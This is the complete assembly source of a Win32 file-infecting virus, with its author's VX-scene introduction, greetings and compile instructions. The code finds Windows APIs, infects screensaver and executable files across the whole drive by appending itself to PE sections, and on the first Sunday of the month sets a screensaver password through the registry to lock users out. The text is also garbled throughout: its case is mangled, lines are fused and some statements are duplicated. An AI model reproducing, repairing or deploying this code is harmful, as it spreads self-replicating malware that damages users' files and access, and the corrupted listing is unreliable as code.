;? ----------
Win32.ScreenferenceRy Malfunction
;
Hi Out there! this is my first little win32 infector. there's nothing
Special At It, No New Technique, No New Way of Infecting. Yes, IT IS
A Very Poor Coded Direct action infector. :(
But: have you ever heard of mcafee's silly feature 'scanning while
The screensaver runs'?
This Virus is The answer to That Feature. An infected exe-file
Will Infect Only Scr-Filez in the% Windir% and% Windir% / System Directoriez.
An Infected Scr-File Will Create A New Thread for Infecting and Then
immediately return to the host. The created thread infectz the whole
HD usin 'a dir traversal. I know it's slow and makes the user
Suspicious, But it's funny: a Virus That Infectz During The Screensaver ...
; -------?
Thanx 'N' Greetz:
; -----------------
;
WANG_E: I'm Sure That U'Ll Have Yer OWN OS One Day.
; THX for All Da Help, My Friend!
Blackart: Yeah, I'm STILL CODIN 'THAT TROJAN ...
Evil_byte: Mittlerweile Schon Mal "Mirror, Mirror" Von
Blind Guardian GEH block T?;)
Benny / 29A: All Yer Tutes in 29a # 4 ROX!
; Lord Julus: Vx-Tasy # 1 is one of the best ezines i Have Ever seen
;
;
Compile with: tasm32.exe / m9 / ml screenf.asm
; TLINK32.EXE / AA / TPE / C / X Screenf.obj,, IMPORT32.LIB
Pewrite.exe Screenf.exe
;
(Pewrite Is Part of Lord Julus' VX-Tasy # 1)
.386
.MODEL FLAT
EXTRN Messageboxa: Proc
EXTRN EXITPROCESS: PROC
EXTRN GETPROCADDRESS: PROC
EXTRN GETMODULEHANDLEA: PROC
.DATA
Dummy_title DB "Senseless Dummy PROG V1.01", 0
Dummy_msg DB "Dummy Prog Carrying a Little Win32 Infector ...", 0
.code
Dummy:
Push 0; Just A Dummy ...
Push offset dummy_title
Push Offset Dummy_MSGPUSH 0
Call Messageboxa
PUSH 0
Call EXITPROCESS
v_size = v_end - v_start
v_start:; Gimme That Delta
Call delta
Delta:
POP EBP
JMP over_var; Variables Part I
FILEHANDLE DD?
Maphandle DD?
MapAddr DD?
MapSize DD?
KEYHANDLE DD?
Value1 DD 1
HMODULE DD?
Oldeip DD?
FileAlign DD?
K32Name DB "kernel32", 0
Advapiname DB "Advapi32", 0
Procsfound DB 0
Searchmask DB "* .scr", 0
Wildcard db "*. *", 0
Root db '/', 0
Nested DB 0
Dotdot DB "..", 0
FNHANDLE DD?
Fnhandle2 DD?
THREADID DD?
_alloc dd?
PTRGETPROCADDRESS DD?
PTRGETMODULEHANDLEA DD?
FILETYPE DB 'E'
_GetProcaddress DB "getProcaddress", 0
_GetModuleHandlea DB "getModuleHandlea", 0
APIs:
GetWindowsDirectorya DD?
GetCurrentDirectorya DD?
SETCURRENTDIRECTORYA DD?
GetSystemDirectorya DD?
GetCommandlinea DD?
GetSystemTime DD?
EXITTHREAD DD?
CREATTHREAD DD?
CloseHandle DD?
UnmapViewoffile dd?
MapViewOffile DD?
SETFILEATTRIBUTESA DD?
CREATEFILEMAPPINGA DD?
CREATEFILEA DD?
FINDNEXTFILEA DD?
FindFirstFilea DD?
VirtualAlloc DD?
LoadLibrarya DD?
RegSetValueExa DD?
Over_var:
DB 0B8H; MOV Eax, IMM32; Save Old EIP
Oldeip2 DD Offset Dummy
MOV [EBP OLDEIP-DELTA], EAX
DB 0B8H; MOV Eax, IMM32; Trace to Import Table
BaseAddress DD 00400000H
Add Eax, [EAX 3CH]
Add Eax, 80h
Mov Eax, [EAX]
Add Eax, [EBP BaseAddress-Delta]
IMPORT1:
CMP DWORD PTR [EAX], 0; Last Import Descriptor?
JZ Quit
Mov ESI, [EAX 0CH]
Add ESI, [EBP BaseAddress-Delta]
Lea EDI, [EBP K32NAME-DELTA]; Is IT KERNEL32?
Push 2
POP ECX
Rep CMPSD
JZ Import2
Add Eax, 14h
JMP import1
IMPORT2:
MOV EBX, [EAX]; Search for the needed APIMOV EDX, [EAX 10H]; Addresses ...
Add EBX, [EBP BaseAddress-Delta]
Add Edx, [EBP BaseAddress-Delta]
IMPORT3:
CMP DWORD PTR [EBX], 0
JZ NO_MORE_IMP
Mov ESI, [EBX]
Add ESI, [EBP BaseAddress-Delta]
Inc ESI
Inc ESI
PUSH ESI
Lea EDI, [EBP _GETPROCADDRESS-DELTA]; Is IT GetProcAddress?
Push 14
POP ECX
REP CMPSB
JNZ NO_STORE1
Mov Edi, [EDX]
MOV [EBP PTRGETPROCADDRESS-DELTA], EDI
Inc Byte PTR [EBP Procsfound-Delta]
NO_STORE1:
Lea EDI, [EBP _GETMODULEHANDLEA-DELTA]; Is IT getModuleHandlea?
Push 4
POP ECX
POP ESI
Rep CMPSD
JNZ NO_STORE2
Mov Edi, [EDX]
MOV [EBP PTRGETMODULEHANDLEA-DELTA], EDI
Inc Byte PTR [EBP Procsfound-Delta]
NO_STORE2:
Add ebx, 4
Add EDX, 4
JMP IMPORT3
NO_MORE_IMP:
CMP BYTE PTR [EBP Procsfound-Delta], 2; Both Apiaddresses Found?
Jnz quit
MOV BYTE PTR [EBP Procsfound-Delta], 0
Lea Eax, [EBP K32NAME-DELTA]; GIMME K32 BASE
Push EAX
Call [EBP PTRGETMODULEHANDLEA-DELTA]
MOV [EBP HMODULE-DELTA], EAX
PUSH 18
POP ECX
Lea EDI, [EBP APIS-DELTA]
Lea ESI, [EBP PTR_TABLE-DELTA]
GET_APIS:; Retrieve All Needed APIZ
Lodsd
Add Eax, EBP
Sub Eax, Offset Delta
Push ECX
Push EDI
PUSH ESI
Push EAX
Push DWORD PTR [EBP HMODULE-DELTA]
Call [EBP PTRGETPROCADDRESS-DELTA]
POP ESI
POP EDI
POP ECX
Test Eax, EAX
JZ Quit
Stosd
Loop get_apis
Push 40h; Allocate 1000 Bytes
Push 1000h
Push 1000
PUSH 0
Call [EBP Virtualaloc-Delta]
Test Eax, EAX
JZ Quit
MOV [EBP _ALLOC-DELTA], EAX
Add Eax, 580; Get System Time
Push EAX
Push EAX
Call [EBP GetSystemTime-Delta]
POP EAX
CMP Word PTR [EAX 4], 0; Sunday?
JNZ NO_PAYLOAD
CMP Word PTR [EAX 6], 7; 1st Sunday of Month? JA NO_PAYLOAD
Lea Eax, [EBP Advapiname-Delta]; load advapi32.dll
Push EAX
Call [EBP LOADLIBRARYA-DELTA]
Test Eax, EAX
JZ NO_PAYLOAD
Push Eax; Get RegopenkeyExa Address
LEA EBX, [EBP _REGOPENKEYEXA-DELTA]
Push EBX
Push EAX
Call [EBP PTRGETPROCADDRESS-DELTA]
Lea EBX, [EBP Keyhandle-Delta]; Open the REG KEY
Push EBX
Push 001f0000h
PUSH 0
Lea EBX, [EBP RegKey-Delta]
Push EBX
PUSH 80000001H
Call EAX
POP Eax; Get RegSetValueexa Address
Lea EBX, [EBP _REGSETVALUEEXA-DELTA]
Push EBX
Push EAX
Call [EBP PTRGETPROCADDRESS-DELTA]
MOV [EBP RegSetValueexa-Delta], EAX
Push 25; Set Screensaver PWD
Lea EBX, [EBP VALUE2-DELTA]
Push EBX
Push 3
PUSH 0
Lea EBX, [EBP VALUE2NAME-DELTA]
Push EBX
Push DWORD PTR [EBP KeyHandle-Delta]
Call EAX
Push 4; Enable Screensaver PWD
Lea Eax, [EBP VALUE1-DELTA]
Push EAX
Push 4
PUSH 0
Lea Eax, [EBP VALUE1NAME-DELTA]
Push EAX
Push DWORD PTR [EBP KeyHandle-Delta]
Call [EBP RegSetValueexa-Delta]
NO_PAYLOAD:
MOV EAX, [EBP _Alloc-Delta]; Get Current Dir
Add Eax, 320
Push EAX
Push 260
Call [EBP GETCURRENTDIRECTORYA-DELTA]
CMP BYTE PTR [EBP FILETYPE-DELTA], 'E'; IS An EXE OR A SCR EXECUTED?
JNZ Screen_save
ITS_EXE:
MOV DWORD PTR [EBP Searchmask 1-Delta], 'RCS.'; set for findfile
MOV BYTE PTR [EBP FILETYPE-DELTA], 'S'
MOV EAX, [EBP _Alloc-Delta]; Infect Windoze Dir
Push EAX
Push 320
Push EAX
Call [EBP GETWINDOWSDIRECTORYA-DELTA]
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Call infect_dir
MOV EAX, [EBP _Alloc-Delta]; Infect Windoze / System Dir
Push EAX
Push 320
Push EAX
Call [EBP GetSystemDirectorya-Delta] Call [EBP SETCURRENTDIRECTORYA-DELTA]
Call infect_dir
MOV EAX, [EBP _Alloc-Delta]; Go to Old Dir
Add Eax, 320
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Quit:
JMP [EBP OLDEIP-DELTA]; JMP to Host
Screen_save:
MOV DWORD PTR [EBP Searchmask 1-Delta], 'EXE.'; set for findfile
MOV BYTE PTR [EBP FILETYPE-DELTA], 'E'
Call [EBP getcommandlinea-delta]; Get CommandLine
Mov Edi, EAX
XOR EAX, EAX
Get_end:
Scasb
JNZ get_end
CMP BYTE PTR [EDI-2], 'S'; WAS THE parameter / s?
JZ Run_It; (WE Don't want to infect
CMP BYTE PTR [EDI-2], 'S'; When SCR IS Configurated)
JZ Run_IT
JMP quit
Run_it:
MOV [EBP SAVE_EBP-DELTA], EBP; Save Ebp for New Thread
Lea Eax, [EBP Threadid-Delta]; Create The Infection Thread
Push EAX
PUSH 0
PUSH 0
Lea Eax, [EBP Mythread-Delta]
Push EAX
PUSH 0
PUSH 0
Call [EBP CREATTHREAD-DELTA]
JMP quit; return to host
Mythread:
DB 0BDH; MOV EBP, IMM32; Get Delta Handle
Save_ebp dd?
Lea Eax, [EBP ROOT-DELTA]; SET ROOT DIR AS CURRENT DIR
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Call dirtrav; infect!
PUSH 0
Call [EBP EXITTHREAD-DELTA]; EXIT THREAD
Dirtrav:
Call Infect_Dir; Infect Directory
Push DWORD PTR [EBP _Alloc-Delta]; Find Dir
Lea Eax, [EBP WILDCARD-DELTA]
Push EAX
Call [EBP FINDFIRSTFILEA-DELTA]
Push EAX
INC EAX
JZ Check_Root
Dec EAX
MOV [EBP FNHANDLE-DELTA], EAX
JMP Test_iF_Dir
FINDNEXTDIR:
Push DWORD PTR [EBP _Alloc-Delta]; Find Next Dir
Push DWORD PTR [EBP FNHANDLE-DELTA]
Call [EBP FINDNEXTFILEA-DELTA]
Test Eax, EAX
JZ Check_Root
TEST_IF_DIR:
Mov Eax, [EBP _ALLOC-DELTA]
Test DWORD PTR [EAX], 10H; Is IT A Directory? JZ Findnextdir
Mov Eax, [EBP _ALLOC-DELTA]
Add Eax, 44
CMP BYTE PTR [EAX], '.'; is it '.' or '..'?
JZ FINDNEXTDIR
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]; Go to Found Dir
Inc Byte PTR [EBP NESTED-DELTA]
Call Dirtrav; Recursive!
MOV EAX, [ESP]
MOV [EBP FNHANDLE-DELTA], EAX
JMP FindNextdir
Check_root:
CMP BYTE PTR [EBP NESTED-DELTA], 0; Are We at root?
JZ end_trav
Lea EAX, [EBP DOTDOT-DELTA]; Go to '..'
Push EAX
Call [EBP SETCURRENTDIRECTORYA-DELTA]
Dec Byte PTR [EBP NESTED-DELTA]
End_trav:
Add ESP, 4
RET
INFECT_DIR:
Push DWORD PTR [EBP _Alloc-Delta]; Find A File
Lea EAX, [EBP Searchmask-Delta]
Push EAX
Call [EBP FINDFIRSTFILEA-DELTA]
INC EAX
JZ NO_MORE_FILEZ
Dec EAX
MOV [EBP FNHANDLE2-DELTA], EAX
JMP infect_file
FINDNEXTFILE:
Push DWORD PTR [EBP _ALLOC-DELTA]; Find Next File
Push DWORD PTR [EBP FNHANDLE2-DELTA]
Call [EBP FINDNEXTFILEA-DELTA]
Test Eax, EAX
JZ NO_MORE_FILEZ
Infect_file:
XOR EDX, EDX
Mov Eax, [EBP _ALLOC-DELTA]
Mov Eax, [EAX 32]
MOV ECX, 201
Div ECX
Test EDX, EDX
JZ FINDNEXTFILE; ALREADY INFECTED?
MOV EAX, [EBP _Alloc-Delta]; (fsize modulo 201 = 0)
Mov Eax, [EAX 32]
Add Eax, v_size; align fsize to 201 ...
Push EAX
XOR EDX, EDX
Div ECX
POP EAX
SUB EDX, 201
NEG EDX
Add Eax, EDX
MOV [EBP MAPSIZE-DELTA], EAX; ... And Save IT
Push 80h; Clear File Attributes
Mov Eax, [EBP _ALLOC-DELTA]
Add Eax, 44
Push EAX
Call [EBP SETFILEATTRIBUTESA-DELTA]
Test Eax, EAX
JZ FindNextFile
PUSH 0; OPEN file
Push 80h
Push 3
PUSH 0
PUSH 0
Push 0C0000000H
Mov Eax, [EBP _ALLOC-DELTA]
Add Eax, 44
Push EAX
Call [EBP CREATEFILEA-DELTA]
INC EAX
JZ FindNextFile
Dec EAX
MOV [EBP FileHandle-Delta], EAX
Push 0; Map File Part I
Push DWORD PTR [EBP MAPSIZE-DELTA]
PUSH 0
Push 4
PUSH 0
Push EAX
Call [EBP CREATEFILEMAPPINGA-DELTA]
Test Eax, EAX
JZ Closefile
MOV [EBP MAPHANDLE-DELTA], EAX
Push DWORD PTR [EBP MAPSIZE-DELTA]; MAP File Part II
PUSH 0
PUSH 0
Push 2
Push EAX
Call [EBP MAPVIEWOFFILE-DELTA]
Test Eax, EAX
JZ Closefile
MOV [EBP MAPADDR-DELTA], EAX
CMP Word PTR [EAX], 'ZM'; EXE SIGNATURE?
JNZ Unmap
Add Eax, [EAX 3CH]
MOV EDX, [EBP MAPADDR-DELTA]
CMP EAX, EDX
JNAE Unmap
Mov EDI, [EBP _Alloc-Delta]
Add Edx, [EDI 32]
CMP EAX, EDX
Ja unmap
CMP DWORD PTR [EAX], 00004550H; PE SIGNATURE?
JNZ Unmap
Mov Edx, [EAX 28H]; Save Entrypoint
MOV [EBP OLDEIP2-DELTA], EDX
Mov Edx, [EAX 34H]
MOV [EBP BaseAddress-Delta], EDX; Save Base Address
Add [EBP OLDEIP2-DELTA], EDX
MOV EDX, [EAX 3CH]; Save file alignment
MOV [EBP FileAlign-Delta], EDX
Mov ESI, [EAX 74H]; Go to the last section header
SHL ESI, 3
Movzx EBX, Word PTR [EAX 6]
Dec EBX
XCHG EAX, EBX
Imul Eax, Eax, 28h
Lea ESI, [ESI EAX 78H]
Add ESI, EBX
OR DWORD PTR [ESI 24H], 0E0000020H; Set Characteristix
Add DWORD PTR [ESI 8], V_SIZE; CORRECT VIRTUALSIZE
MOV Eax, [ESI 8]
XOR EDX, EDX; Calculate New Rawsize
MOV ECX, [EBP FileAlign-Delta]
Div ECX
Test EDX, EDX
JZ NO_INC
INC EAX
NO_INC:
Mul ECX
Mov Edx, EAX
Sub EDX, [ESI 10h]
Add [EBX 50H], EDX; Add Increase to Image Size
MOV [ESI 10h], EAX; Save New Rawsize
PUSH ESI
Mov Edi, [ESI 8]; Prepare to Copy Virus
Add Edi, [ESI 14H]
SUB EDI, V_SIZE
Add EDI, [EBP MAPADDR-DELTA] MOV ECX, V_SIZE; COPY IT!
Lea ESI, [EBP V_START-DELTA]
REP MOVSB
POP ESI; Save New Entrypoint
Mov EDI, [ESI 8]
Add Edi, [ESI 0CH]
SUB EDI, V_SIZE
MOV [EBX 28H], EDI
Unmap:
Push DWORD PTR [EBP MAPADDR-DELTA]; Unmap file
Call [EBP UnmapViewOffile-Delta]
Closefile:
Push DWORD PTR [EBP FileHandle-Delta]; And Close IT
Call [EBP CloseHandle-Delta]
MOV EAX, [EBP _Alloc-Delta]; restore Old Attribs
Push EAX
Add Eax, 44
Push EAX
Call [EBP SETFILEATTRIBUTESA-DELTA]
JMP FindNextFile
NO_MORE_FILEZ:
RET
Variables Part II
Apinames:
_GetWindowsDirectorya DB "getWindowsDirectorya", 0
_GetcurrentDirectorya DB "getcurrentdirectorya", 0
_SetcurrentDirectorya DB "setcurrentdirectorya", 0
_GetsystemDirectorya DB "getsystemdirectorya", 0
_GetCommandlinea DB "getcommandlinea", 0
_GetsystemTime DB "getsystemtime", 0
_EXITTHREAD DB "exitthread", 0
_CreateThread DB "CreateThread", 0
_CloseHandle DB "CloseHandle", 0
_UnmapViewoffile DB "unmapviewoffile", 0
_MapViewoffile DB "MapViewoffile", 0
_SETFileAttributesa DB "setfileAttributesa", 0
_CreateFileMappinga DB "CreateFilemappinga", 0
_CreateFilea DB "Createfilea", 0
_FindNextFilea DB "FindNextFilea", 0
_FindfirstFilea DB "Findfirstfilea", 0
_Virtualalloc DB "Virtualalloc", 0
_LoadLibrarya DB "LoadLibrarya", 0
_RegSetValueexa DB "RegSetValueexa", 0
_REGOPENKEYEXA DB "regopenkeyexa", 0
PTR_TABLE:
DD Offset _GetWindowsDirectorya
DD Offset _GetcurrentDirectorya
DD Offset_SetCurrentDirectorya
DD Offset _getsystemDirectorya
DD Offset _GetCommandLineAdd Offset _getsystemtime
DD Offset _exitthread
DD Offset _CreateTHRead
DD offset _closehandle
DD Offset _unmapViewoffile
DD Offset _MapViewoffile
DD Offset_SetFileAttributesa
DD offset _createfilemappinga
DD offset _createfilea
DD offset _findnextfilea
DD offset _findfirstfilea
DD offset _virtualalloc
DD Offset _LoadLibrarya
RegKey DB "Control Panel / Desktop", 0
Value1Name DB "Screensaveusepassword", 0
Value2 DB 31H, 42H, 41H, 44H, 32H, 34H, 35H, 38H, 32H, 32H, 32H, 37H, 45H
DB 37H, 35H, 45H, 33H, 39H, 44H, 38H, 30H, 38H, 41H, 41H, 00h
Value2name DB "Screensave_Data", 0
v_end:
END V_START
